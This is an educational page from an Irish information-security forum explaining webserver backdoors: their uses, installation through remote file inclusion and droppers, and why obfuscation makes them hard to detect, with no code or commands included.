×

Irish Information Security Forum

Backdoor Attacks - Cybersecurity

What is a backdoor?

A backdoor is malware that bypasses normal authentication procedures to access a system. As a result, makes remote access to resources within an application, such as databases and file servers, giving attackers the ability to remotely issue system commands and install furter malware.

 

Backdoor installation for example can be achieved by taking advantage of vulnerable components in a web application. Once installed, detection is difficult as files tend to be highly obfuscated.

 

Webserver backdoors are used for a number of malicious activities, including:

  • Data theft
  • Website defacing
  • Server hijacking
  • The launching of distributed denial of service (DDoS) attacks
  • Infecting website visitors (watering hole attacks)
  • Advanced persistent threat (APT) assaults

 

 

Backdoor trojan installation

The most prevalent backdoor installation method involves remote file inclusion (RFI), an attack method that exploits vulnerabilities within applications that dynamically reference external scripts. In an RFI scenario, the referencing function is tricked into downloading a backdoor trojan from a remote host.

 

Attackers identify targets using scanners, which locate websites having unpatched or outdated components that enable file injection. A successful scanner then leverages the vulnerability to install the backdoor. Once installed, it can be accessed at any time, even if the vulnerability enabling its initial insertion has since been patched.

 

Backdoor trojan insertion is often done in a two-step process to bypass security rules preventing the upload of files above a certain size. The first phase involves installation of a dropper—a small file whose sole function is to retrieve a bigger file from a remote location. It initiates the second phase—the downloading and installation of the backdoor script on the server.


Once installed, backdoors are very hard to find as they are almost always masked through the use of alias names and code obfuscation (sometimes even multiple layers of encryption).

 

Detection is further complicated if applications are built on external frameworks that use third-party plugins; these are sometimes fraught with their own vulnerabilities or built-in backdoors. Scanners that rely on heuristic and signature-based rules might not be able to detect hidden code in such frameworks.

 

Even if a backdoor is detected, typical mitigation methods (or even a system reinstallation) may remove it from an applicationthe backdoor has a persistent presence in rewritable memory.

 

IISF Logo

If you are interested in finding out more about the IISF, or would like to attend one of our Chapter Meetings as an invited guest, please contact the
IISF Secretary:

By email:
secretary@iisf.ie

By post:

David Cahill

Information Security

GPO, 1-117
D01 F5P2

Enhance your Cybersecurity knowledge and learn from those at the coalface of information Security in Ireland

 


FORUM SPONSORS

We would like to thank these generous sponsors for their support. 

crowdstrike logo

zscaler logo

 

 

Sponsors are featured prominently throughout the IISF.IE website, social media channels as well as enjoying other benefits Read more

 

secured by edgescan digital security radar logo

© iiSf. All rights reserved. CRN: 3400036GH  - Privacy Statement  - Sponsorship  - Cybersecurity News Topics  - Cybersecurity Resources  - Produced by
LinkedIn Twitter